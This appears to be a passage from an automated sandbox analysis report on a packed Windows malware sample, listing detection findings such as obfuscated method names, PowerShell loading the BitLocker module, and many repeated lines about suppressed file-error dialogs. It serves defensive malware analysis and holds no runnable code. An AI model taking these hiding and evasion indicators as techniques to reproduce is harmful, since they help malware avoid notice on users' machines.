Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d4f16c.3.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d966c4.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.2d45b54.2.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
